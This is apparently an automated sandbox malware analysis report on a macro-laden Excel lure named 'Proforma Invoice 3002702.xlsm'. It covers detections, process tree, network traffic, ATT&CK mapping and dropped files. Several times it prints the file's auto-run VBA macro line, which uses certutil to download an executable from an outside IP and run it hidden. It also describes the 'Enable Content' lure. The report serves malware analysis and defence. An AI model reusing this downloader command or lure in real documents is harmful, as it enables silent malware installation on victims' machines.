Create Interactive Tour

Windows Analysis Report
Proforma Invoice 3002702.xlsm

Overview

General Information

Sample Name:	Proforma Invoice 3002702.xlsm
Analysis ID:	745559
MD5:	6dbf9d1463c9875be684b06d3df716a8
SHA1:	f7a672ea124d5a39a122f6f6203f3b582859e7f8
SHA256:	d3650aeaaa448f77d76acc488425c83ee63f86d3d10d4d2e62ba050882dc4685
Tags:	xlsm
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Document contains an embedded VBA macro which may execute processes

Document exploit detected (process start blacklist hit)

Machine Learning detection for sample

Uses a Windows Living Off The Land Binaries (LOL bins)

Potential document exploit detected (unknown TCP traffic)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2972 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

cmd.exe (PID: 1184 cmdline: cmd /c certutil.exe -urlcache -split -f "http://37.139.128.94/dx/Doc703002702.exe" Zwohzugimcdaxwlqhl.exe.exe && Zwohzugimcdaxwlqhl.exe.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

certutil.exe (PID: 2860 cmdline: certutil.exe -urlcache -split -f "http://37.139.128.94/dx/Doc703002702.exe" Zwohzugimcdaxwlqhl.exe.exe MD5: 4586B77B18FA9A8518AF76CA8FD247D9)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

• AV Detection
• Compliance
• Software Vulnerabilities
• Networking
• System Summary
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• HIPS / PFW / Operating System Protection Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Proforma Invoice 3002702.xlsm

Avira: detected

Antivirus detection for URL or domain

Source: http://37.139.128.94/dx/Doc703002702.exe

Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: Proforma Invoice 3002702.xlsm

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 37.139.128.94:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 37.139.128.94:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 37.139.128.94:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 37.139.128.94:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 37.139.128.94:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 37.139.128.94:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 37.139.128.94:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 37.139.128.94:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 37.139.128.94:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 37.139.128.94:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 37.139.128.94:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 37.139.128.94:80

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\certutil.exe

Network Connect: 37.139.128.94 80

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 37.139.128.94:80

Source: Joe Sandbox View

ASN Name: LVLT-10753US LVLT-10753US

Source: Joe Sandbox View

IP Address: 37.139.128.94 37.139.128.94

Source: unknown	TCP traffic detected without corresponding DNS query: 37.139.128.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.139.128.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.139.128.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.139.128.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.139.128.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.139.128.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.139.128.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.139.128.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.139.128.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.139.128.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.139.128.94
Source: unknown	TCP traffic detected without corresponding DNS query: 37.139.128.94

Source: certutil.exe, 00000004.00000002.1086006521.0000000000303000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: certutil.exe, 00000004.00000002.1086089393.0000000000367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: nookie:user@www.linkedin.com/iLMEM@ equals www.linkedin.com (Linkedin)
Source: certutil.exe, 00000004.00000002.1086006521.0000000000303000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: ~DFFE94407FDA79CF28.TMP.0.dr	String found in binary or memory: http://37.139.128.94/dx
Source: vbaProject.bin	String found in binary or memory: http://37.139.128.94/dx/Doc
Source: ~DFFE94407FDA79CF28.TMP.0.dr	String found in binary or memory: http://37.139.128.94/dx/Doc703002702.exe
Source: certutil.exe, 00000004.00000002.1086061597.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.139.128.94/dx/Doc703002702.exeH
Source: certutil.exe, 00000004.00000002.1086061597.0000000000354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.139.128.94/dx/Doc703002702.exeP
Source: certutil.exe, 00000004.00000002.1085821195.00000000000E4000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000004.00000002.1085880052.00000000002AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.139.128.94/dx/Doc703002702.exeZwohzugimcdaxwlqhl.exe.exe
Source: certutil.exe, 00000004.00000002.1086161955.0000000001E96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.139.128.94/dx/Doc703002702.exeZwohzugimcdaxwlqhl.exe.exe&
Source: cmd.exe, 00000002.00000002.1086721639.0000000000624000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.139.128.94/dx/Doc703002702.exeZwohzugimcdaxwlqhl.exe.exe&&Zwohzugimcdaxwlqhl.exe.exeramW64

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14BBD7F1.png

Jump to behavior

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: Enable Content i ^ 6 7 '~ 8 t 10 11 12 " :: ="mu" 15 ~ "' 16 ~ 17 ~" " 1,8 19 O ;

Document contains an embedded VBA macro which may execute processes

Source: Proforma Invoice 3002702.xlsm

OLE, VBA macro line: PID = Shell("cmd /c certutil.exe -urlcache -split -f ""http://37.139.128.94/dx/Doc703002702.exe"" Zwohzugimcdaxwlqhl.exe.exe && Zwohzugimcdaxwlqhl.exe.exe", vbHide)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil.exe -urlcache -split -f "http://37.139.128.94/dx/Doc703002702.exe" Zwohzugimcdaxwlqhl.exe.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil.exe -urlcache -split -f "http://37.139.128.94/dx/Doc703002702.exe" Zwohzugimcdaxwlqhl.exe.exe			Jump to behavior

Source: C:\Windows\System32\certutil.exe

File deleted: C:\Windows\cer9CEC.tmp

Jump to behavior

Source: C:\Windows\System32\certutil.exe

File created: C:\Windows\cer9CEC.tmp

Jump to behavior

Source: Proforma Invoice 3002702.xlsm

OLE, VBA macro line: Private Sub Workbook_Open()

Source: Proforma Invoice 3002702.xlsm

OLE indicator, VBA macros: true

Source: C0DF.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\System32\certutil.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Proforma Invoice 3002702.xlsm

OLE indicator, Workbook stream: true

Source: C:\Windows\System32\certutil.exe	Console Write: .................D'................. . .O.n.l.i.n.e. . ..........\|..............#.......H~..............x.......&.......q(.w............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....................$.......C...............#.........dw....................z........X2.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....................$.......H...............#.........dw............H...............................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Qcw....................(.P.....................$.......M...............#.......p.$.............................................	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c certutil.exe -urlcache -split -f "http://37.139.128.94/dx/Doc703002702.exe" Zwohzugimcdaxwlqhl.exe.exe && Zwohzugimcdaxwlqhl.exe.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil.exe -urlcache -split -f "http://37.139.128.94/dx/Doc703002702.exe" Zwohzugimcdaxwlqhl.exe.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c certutil.exe -urlcache -split -f "http://37.139.128.94/dx/Doc703002702.exe" Zwohzugimcdaxwlqhl.exe.exe && Zwohzugimcdaxwlqhl.exe.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil.exe -urlcache -split -f "http://37.139.128.94/dx/Doc703002702.exe" Zwohzugimcdaxwlqhl.exe.exe	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Proforma Invoice 3002702.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR5E16.tmp

Jump to behavior

Source: classification engine

Classification label: mal84.expl.evad.winXLSM@5/4@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\certutil.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\certutil.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Proforma Invoice 3002702.xlsm

Initial sample: OLE zip file path = xl/media/image1.png

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C0DF.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\certutil.exe TID: 1008

Thread sleep time: -180000s >= -30000s

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\certutil.exe

Network Connect: 37.139.128.94 80

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\certutil.exe certutil.exe -urlcache -split -f "http://37.139.128.94/dx/Doc703002702.exe" Zwohzugimcdaxwlqhl.exe.exe

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Command and Scripting Interpreter	Path Interception	111 Process Injection	11 Masquerading	OS Credential Dumping	1 Virtualization/Sandbox Evasion	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	12 Scripting	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	11 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	2 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	12 Scripting	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Proforma Invoice 3002702.xlsm	100%	Avira	HEUR/Macro.Downloader
Proforma Invoice 3002702.xlsm	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://37.139.128.94/dx/Doc703002702.exeH	0%	Avira URL Cloud	safe
http://37.139.128.94/dx/Doc703002702.exeZwohzugimcdaxwlqhl.exe.exe&&Zwohzugimcdaxwlqhl.exe.exeramW64	0%	Avira URL Cloud	safe
http://37.139.128.94/dx/Doc703002702.exeP	0%	Avira URL Cloud	safe
http://37.139.128.94/dx/Doc703002702.exeZwohzugimcdaxwlqhl.exe.exe&	0%	Avira URL Cloud	safe
http://37.139.128.94/dx/Doc703002702.exeZwohzugimcdaxwlqhl.exe.exe	0%	Avira URL Cloud	safe
http://37.139.128.94/dx	0%	Avira URL Cloud	safe
http://37.139.128.94/dx/Doc703002702.exe	100%	Avira URL Cloud	malware
http://37.139.128.94/dx/Doc	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
http://37.139.128.94/dx/Doc703002702.exeH	certutil.exe, 00000004.00000002.1086061597.0000000000354000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://37.139.128.94/dx/Doc703002702.exeZwohzugimcdaxwlqhl.exe.exe	certutil.exe, 00000004.00000002.1085821195.00000000000E4000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000004.00000002.1085880052.00000000002AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://37.139.128.94/dx/Doc703002702.exeZwohzugimcdaxwlqhl.exe.exe&&Zwohzugimcdaxwlqhl.exe.exeramW64	cmd.exe, 00000002.00000002.1086721639.0000000000624000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://37.139.128.94/dx/Doc703002702.exeP	certutil.exe, 00000004.00000002.1086061597.0000000000354000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://37.139.128.94/dx/Doc703002702.exeZwohzugimcdaxwlqhl.exe.exe&	certutil.exe, 00000004.00000002.1086161955.0000000001E96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://37.139.128.94/dx/Doc703002702.exe	~DFFE94407FDA79CF28.TMP.0.dr	true	Avira URL Cloud: malware	unknown
http://37.139.128.94/dx	~DFFE94407FDA79CF28.TMP.0.dr	true	Avira URL Cloud: safe	unknown
http://37.139.128.94/dx/Doc	vbaProject.bin	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
37.139.128.94	unknown	Germany		10753	LVLT-10753US	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	745559
Start date and time:	2022-11-14 14:01:19 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Proforma Invoice 3002702.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.expl.evad.winXLSM@5/4@0/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:02:17	API Interceptor	652x Sleep call for process: certutil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37.139.128.94	6wLhkTMUTm.exe	Get hash	malicious	Browse	37.139.128.94/fx/Lqmsluoi.png
	Proforma Invoice 00031.xlsm	Get hash	malicious	Browse	37.139.128.94/fx/Doc72600331.exe
	Doc75300602.bat	Get hash	malicious	Browse	37.139.128.94/fx/Vdhkmgphu.png
	Doc75300602.exe	Get hash	malicious	Browse	37.139.128.94/fx/Vdhkmgphu.png
	Rigong PO-00025026541.xls	Get hash	malicious	Browse	37.139.128.94/fx/IMG00025026541.exe
	Product List.xls	Get hash	malicious	Browse	37.139.128.94/fx/IMG050-1207-035.exe
	build.exe	Get hash	malicious	Browse	37.139.128.94/b022/lix/pin.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LVLT-10753US	kfsJ6LmO6V.dll	Get hash	malicious	Browse	193.56.146.174
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	SecuriteInfo.com.Win32.DropperX-gen.24826.15315.exe	Get hash	malicious	Browse	194.180.48.203
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194
	file.exe	Get hash	malicious	Browse	193.56.146.194

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 600 x 720, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	363252
Entropy (8bit):	7.996246652392142
Encrypted:	true
SSDEEP:	6144:Z+RqqVOMhdv2WY8hNduZYoFzFN0/5DC5GFvVxUX9eCnlAynPyEYT4c9r33iac:atOMzOH8ZoFzUOcFvwX9eepPZm4c9TiT
MD5:	7771CD4FBD31AE616E18E8EB8594193E
SHA1:	E2B3791678EC553FECF53550CE4733EA291863CE
SHA-256:	5CF537434974ED1948F0B2F0AC13473C332340BA7CE9E4E0D6410B7C1F76465D
SHA-512:	69B5AC45552B0A406BC06332B68D38FE94EBF42E2E8FCB081E4D59154985F33ABED579F94A40CF1DEBB7E6119F25FB185AF770FC7B39227184D94E4EF79B2750
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...X...........>....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.}..]U...=}.O}(%..J..l.....bWPZ.M.QQ...........{/..~n.s...3k.}.i777A....w.w.:3kf.Y3k..Ik.Y.j...W.Y.r...k.,[.........V.^.z.....X..24].z.5..].f......5k6/C.5...VoX.z..5o..z.k..u..................Y.b....A..U._.rj...._.f.....4..eo...C......5 ....^.l...)0..[.b..U.6....e.73p.~....\|.....o3....^..&..-..:t......?...\|.Z.$(:.{@ 1FB-..Q....k.Q.....@...0Q.?....!......../..0.H.8.`j.&..5...ys.u.Vn....1.....b..C.)8...Q.X......]C........4\|.xY....$....$.S#.5B. .V..P.....C4. >....k.WAbk.X........j..(..P....x..5..,.. J#..2;....u...U.W....Q....._e...yv..'....D..5\|...xWC.$__.j.._....q.K../.Q..Dy..?...Es.$I...!../{c..G..%!.+V,[.Rc.x..\.l...g...)C.X.!;....1..LI.8.SR..?..U.k.ubD'b..p...Y..f.....-.b\|..j.....U.8.NC.?....Z..$^....$.......2.;@......-...o.Y\.s....)YT.w...l....I...YY.yy9.ii...Rrr23..S.Ne...........222...32....s23.....3. /#===-7=;##'/=;.Z..e.wi9.&==7=

C:\Users\user\AppData\Local\Temp\C0DF.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFFE94407FDA79CF28.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.9261428369569087
Encrypted:	false
SSDEEP:	96:f0Y70Xma8iYo0gI+Cm678Ih/1vJ4qhmC/lRy4HovOJsC+luMN1/YXwoeBaMTi:z0WSYhx7xx84HpsF1KxMa
MD5:	B99B9DD217C6AD829AA32A7E55E724CD
SHA1:	DF1AF9884BB64A43B7D3066D634ADA2E0292EE0B
SHA-256:	E245598E316F14B36A9E20BEBDA5E88BFC093F2B828844F8A61F011B3F8C1D87
SHA-512:	B6449C414B0151D6FC27FC75C546233A1D1B12627E731C80828EFD241C7D133E63A2D11825483B4BA07EBACBB5812E2C3014B3548D79BE942E345277AE7CF40F
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Proforma Invoice 3002702.xlsm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:	Microsoft Excel 2007+
Entropy (8bit):	7.996781662361583
TrID:	Excel Microsoft Office Open XML Format document with Macro (52504/1) 52.24% Excel Microsoft Office Open XML Format document (40004/1) 39.80% ZIP compressed archive (8000/1) 7.96%
File name:	Proforma Invoice 3002702.xlsm
File size:	371938
MD5:	6dbf9d1463c9875be684b06d3df716a8
SHA1:	f7a672ea124d5a39a122f6f6203f3b582859e7f8
SHA256:	d3650aeaaa448f77d76acc488425c83ee63f86d3d10d4d2e62ba050882dc4685
SHA512:	1c655f64f352df777f44af4a77381715241ed17cec16d6ea8f3800295ae707fae67d7c24fab44a0c09ce1cb7507e426703f7e91cb53706a47d9b6fbfde639c70
SSDEEP:	6144:wE+RqiI9rPYvKW88hNdgZKoJzHN0/5DC5GHvvxU99oCnlAyPPyuUTuc9r33Yay:wLI9rgy583oJzeOcHvG99oep3B6uc9TI
TLSH:	238423B4976C58E346CC35B7D488129CF160F633938AEB9B1DE89879940324C4BFE799
File Content Preview:	PK........+.nU\|^\|/............[Content_Types].xml.TMo.0..+......b....v......HL.F_..4.....k.w..........e....w..3..:q)g.....a...._.O.......;.G.7...>!5.......Y).=z ...FV1{(...J.7.Fu5.]+.C.P.Rk....W..J.e...;a}.Oa-...o..j.>`@J.j(......h_-..n...&...w...I....3..

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "/opt/package/joesandbox/database/analysis/745559/sample/Proforma Invoice 3002702.xlsm"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Author:
Last Saved By:
Create Time:	2021-08-19T14:03:52Z
Last Saved Time:	2022-09-19T22:28:28Z
Creating Application:
Security:	0

Document Summary

